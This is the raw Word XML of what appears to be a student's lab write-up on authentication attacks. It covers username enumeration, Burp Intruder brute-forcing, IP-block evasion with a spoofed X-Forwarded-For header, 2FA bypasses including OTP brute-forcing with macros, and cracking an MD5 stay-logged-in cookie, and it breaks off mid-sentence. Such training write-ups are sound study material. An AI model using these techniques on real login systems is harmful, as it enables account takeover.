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0994" w14:textId="7FE61646" w:rsidR="00320924" w:rsidRDefault="00255705" w:rsidP="00511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55705">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Username enumeration via different responses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0EC5DBA" w14:textId="060C5965" w:rsidR="00EF3B42" w:rsidRPr="00A05FFB" w:rsidRDefault="006551F1" w:rsidP="00EF3B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Exploited the vulnerability by </w:t>
      </w:r>
      <w:r w:rsidR="0079426E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">mounting a brute force attack </w:t>
      </w:r>
      <w:r w:rsidR="00B21F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">on the username and password by using the given wordlist </w:t>
      </w:r>
      <w:r w:rsidR="00710BD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00710BD3"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 w:rsidR="00710BD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intruder’s Payload Tab.</w:t>
      </w:r>
      <w:r w:rsidR="00E2032F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upon getting the response as 302 or the length of the content was different, we identified that these passwords are correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE80076" w14:textId="63220B27" w:rsidR="00EF3B42" w:rsidRDefault="000543AE" w:rsidP="00EF3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43AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Username enumeration via subtly different responses</w:t>
      </w:r>
      <w:r w:rsidR="00EA1D15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487C69D" w14:textId="2C589F15" w:rsidR="00EA1D15" w:rsidRDefault="000E1C61" w:rsidP="00EA1D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Exploited the vulnerability by </w:t>
      </w:r>
      <w:r w:rsidR="003553AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">noticing that when correct username is entered then there the application shows a slightly different </w:t>
      </w:r>
      <w:r w:rsidR="00A92CB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">response than others which helped us mount a brute force attack on username and password using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A92CB6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A92CB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00934325">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F98F83" w14:textId="742D7F4C" w:rsidR="0027015F" w:rsidRDefault="00273FC9" w:rsidP="00270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73FC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Username enumeration via response timing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B4D5646" w14:textId="7CFCF54E" w:rsidR="00F43A01" w:rsidRDefault="00273FC9" w:rsidP="00557F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in this case </w:t>
      </w:r>
      <w:r w:rsidR="00370C45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the application implemented a</w:t>
      </w:r>
      <w:r w:rsidR="00680EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00370C45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Based Brute Force </w:t>
      </w:r>
      <w:r w:rsidR="002020F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>protection which blocks any IP that make more than a specific number of requests in a given time frame</w:t>
      </w:r>
      <w:r w:rsidR="00680EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we used </w:t>
      </w:r>
      <w:r w:rsidR="00680EA3" w:rsidRPr="00680EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“X-Forwarded-For: 0-100”</w:t>
      </w:r>
      <w:r w:rsidR="00680EA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80EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">header </w:t>
      </w:r>
      <w:r w:rsidR="00C014B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">which  helped us spoof our IP on each request </w:t>
      </w:r>
      <w:r w:rsidR="00680EA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and again mounted a brute force attack first on username with a very long predefined string of password and noticed the response timing </w:t>
      </w:r>
      <w:r w:rsidR="00FD7510">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and whichever took the highest amount of time then that is our valid username and then mounted the same on password</w:t>
      </w:r>
      <w:r w:rsidR="00557FB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0774D8" w14:textId="5063376C" w:rsidR="00557FB6" w:rsidRDefault="00C13191" w:rsidP="0055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13191">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Broken brute-force protection, IP block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90EAE9D" w14:textId="6DAF9273" w:rsidR="00C13191" w:rsidRDefault="00F625D4" w:rsidP="00C131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in this case the application blocks any IP that makes 3 failed login attempts </w:t>
      </w:r>
      <w:r w:rsidR="00145B43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>in a row but resets the counter when a user successfully logs in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EF59FF" w14:textId="4B09D8E4" w:rsidR="00E26BF8" w:rsidRDefault="00145B43" w:rsidP="00E26B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Exploited the vulnerability by using either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Turbo Intruder or Macros</w:t>
      </w:r>
      <w:r w:rsidR="002D3248">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> but we’re doing it manually this time by appending our own username and password after each brute force attempt which makes the application login successfully</w:t>
      </w:r>
      <w:r w:rsidR="00373D30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> which resets the counter and we can still get the credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB19F03" w14:textId="31679A46" w:rsidR="00E26BF8" w:rsidRDefault="00AC6D60" w:rsidP="00E26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6D60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Username enumeration via account lock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19F3CA4" w14:textId="2408BCBC" w:rsidR="00802F05" w:rsidRDefault="000C71DF" w:rsidP="00802F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case there was an account lock implemented </w:t>
      </w:r>
      <w:r w:rsidR="00802F05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>in this application so</w:t>
      </w:r>
      <w:r w:rsidR="00EB2DE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we brute forced this application using only the list of usernames first by trying each username for 5 times until we notice any changes in the response</w:t>
      </w:r>
      <w:r w:rsidR="0019366C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Cluster bomb attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0DE96" w14:textId="6C40D25E" w:rsidR="00EB2DE2" w:rsidRDefault="00EB2DE2" w:rsidP="00802F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after getting the </w:t>
      </w:r>
      <w:r w:rsidR="004A69CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>username,</w:t>
      </w:r>
      <w:r w:rsidR="00D87957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we exploited the </w:t>
      </w:r>
      <w:r w:rsidR="005D6B08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>password by mounting a brute force attack</w:t>
      </w:r>
      <w:r w:rsidR="004A69CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Sniper attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF217DB" w14:textId="103075D2" w:rsidR="00814DBC" w:rsidRDefault="00697CC6" w:rsidP="0081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7CC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Broken brute-force protection, multiple credentials per request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3042A58" w14:textId="3C52FD0E" w:rsidR="00697CC6" w:rsidRDefault="003E039C" w:rsidP="00697C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Exploited the vulnerability by noticing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Intercept Proxy that the application </w:t>
      </w:r>
      <w:r w:rsidR="00076A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sends login data in JSON format which will allow us to send all the possible passwords in JSON format separated by commas which will log us in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C53854" w14:textId="7801F4AF" w:rsidR="001C258F" w:rsidRDefault="00C8071A" w:rsidP="00425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8071A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2FA simple bypass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2C9E344" w14:textId="16B0EE1C" w:rsidR="00C8071A" w:rsidRDefault="00C8071A" w:rsidP="001A7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multi factor authentication sometimes </w:t>
      </w:r>
      <w:r w:rsidR="00C31EB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the application logs the user in his account and then asks for an OTP so going to some other domain can keep you logged in without providing any OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078655C2" w14:textId="5D1A7E48" w:rsidR="00427851" w:rsidRDefault="00427851" w:rsidP="00427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2FA broken logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565F3E0" w14:textId="667A216E" w:rsidR="009D642C" w:rsidRPr="009D642C" w:rsidRDefault="002377D6" w:rsidP="009D642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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">In some </w:t>
      </w:r>
      <w:r w:rsidR="00C15233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>cases,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> after logging in using the username password the application does not verifies if the </w:t>
      </w:r>
      <w:r w:rsidR="00487EBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">user who logged in is the one providing the OTP so we exploited this by modifying the HTTP request in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00487EBD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487EBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intercept tab by changing the username </w:t>
      </w:r>
      <w:r w:rsidR="00A169EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">in the request </w:t>
      </w:r>
      <w:r w:rsidR="00B10E77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">it generates an OTP for victim’s account </w:t>
      </w:r>
      <w:r w:rsidR="00A169EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and then </w:t>
      </w:r>
      <w:r w:rsidR="002112B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">brute forcing the </w:t>
      </w:r>
      <w:r w:rsidR="00A169EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>OTP which allowed us to log in</w:t>
      </w:r>
      <w:r w:rsidR="000E1FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7042EB" w14:textId="4DE24ED7" w:rsidR="00C15233" w:rsidRDefault="009D642C" w:rsidP="00C15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642C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2FA bypass using a brute-force attack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58135ED" w14:textId="124F7420" w:rsidR="009D642C" w:rsidRDefault="006E18E1" w:rsidP="009D6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case if we try to enter wrong OTP twice then we’re logged out automatically</w:t>
      </w:r>
      <w:r w:rsidR="00090622">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> so we’re going to use</w:t>
      </w:r>
      <w:r w:rsidR="003925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92519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392519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session Handling and Macros to </w:t>
      </w:r>
      <w:r w:rsidR="00A57396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E7D7C" w14:textId="651B79D9" w:rsidR="00A725D9" w:rsidRDefault="00A725D9" w:rsidP="009D6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We’ll go to project options then session</w:t>
      </w:r>
      <w:r w:rsidR="001D5B34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tab</w:t>
      </w:r>
      <w:r w:rsidR="001D5B34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, in session handling rules panel select add</w:t>
      </w:r>
      <w:r w:rsidR="007D286C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EAA86" w14:textId="3C524CC6" w:rsidR="007D286C" w:rsidRDefault="007D286C" w:rsidP="009D6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in the dialogue box go to scope</w:t>
      </w:r>
      <w:r w:rsidR="00F1435B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, under scope URL click select all URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C17A85" w14:textId="209C7578" w:rsidR="00F1435B" w:rsidRDefault="00F1435B" w:rsidP="009D6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back to details tab</w:t>
      </w:r>
      <w:r w:rsidR="00B31415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and under rule actions click Add then click run a macro</w:t>
      </w:r>
      <w:r w:rsidR="00E70976">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41E7D9" w14:textId="219D786F" w:rsidR="00E70976" w:rsidRDefault="00E70976" w:rsidP="009D6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Under select macro </w:t>
      </w:r>
      <w:r w:rsidR="002014C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>click add to open the macro recorder</w:t>
      </w:r>
      <w:r w:rsidR="003514D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select the requests you want to make before each brute force iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47DC28" w14:textId="30464ED2" w:rsidR="003514D8" w:rsidRDefault="00C42695" w:rsidP="009D6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click OK,</w:t>
      </w:r>
      <w:r w:rsidR="0073104A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> then the macro editor dialogue box opens then click test macro</w:t>
      </w:r>
      <w:r w:rsidR="009A78CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and verify that it’s the response you wanted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C006E" w14:textId="13F8FFF5" w:rsidR="009A78CE" w:rsidRDefault="00CD34BC" w:rsidP="009D6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Keep clicking Ok to close all boxes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189176D4" w14:textId="50AA24DE" w:rsidR="00CD34BC" w:rsidRDefault="00D35C72" w:rsidP="009D6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after every attempt </w:t>
      </w:r>
      <w:r w:rsidR="00265065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">of brute force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED73EE"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 w:rsidR="00ED73EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> will log us back in </w:t>
      </w:r>
      <w:r w:rsidR="00055836">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and provide us the OTP page directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA7E07" w14:textId="1C4D1831" w:rsidR="00DF1902" w:rsidRDefault="00DF1902" w:rsidP="009D64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5A561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will mount a brute force attack on OTP by selecting Payload as Numbers and in the Resource Pool tab we will select 1 Concurrent request at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379AD2F4" w14:textId="0F28E958" w:rsidR="0003022F" w:rsidRDefault="00B068C7" w:rsidP="00030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68C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Brute-forcing a stay-logged-in cookie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FD69281" w14:textId="2B86D7B3" w:rsidR="00B068C7" w:rsidRDefault="00605FE8" w:rsidP="00B068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Exploited the vulnerability by paying attention to the </w:t>
      </w:r>
      <w:r w:rsidR="001A675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>stay-logged-in cookie and decoding it using Base</w:t>
      </w:r>
      <w:r w:rsidR="00CC1D82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>64-</w:t>
      </w:r>
      <w:r w:rsidR="00F86F73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:r w:rsidR="007D62DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> decoder</w:t>
      </w:r>
      <w:r w:rsidR="00CC1D82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and by looking at the password we can easily make it out that it is MD5 hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521AA69" w14:textId="48F7D437" w:rsidR="00441625" w:rsidRDefault="00952B96" w:rsidP="00441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need to mount a brute force attack on the password by using wordlist as payload wi</w:t>
      </w:r>
      <w:r w:rsidR="001D7032">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">th payload processing rules like MD5 Hashing, Add Prefix </w:t>
      </w:r>
      <w:r w:rsidR="00F86F73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>wiener: and encode into Base64-encode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D0C8D" w14:textId="39E612F1" w:rsidR="00441625" w:rsidRDefault="00BB3468" w:rsidP="0044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B3468">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Offline password cracking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C19920E" w14:textId="57037C6C" w:rsidR="00BB3468" w:rsidRDefault="00D17F13" w:rsidP="00BB34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case we exploited the vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="006B311B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>by injecting XML code</w:t>
      </w:r>
      <w:r w:rsidR="00FA5A8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FA5A8D" w:rsidRPr="00FA5A8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
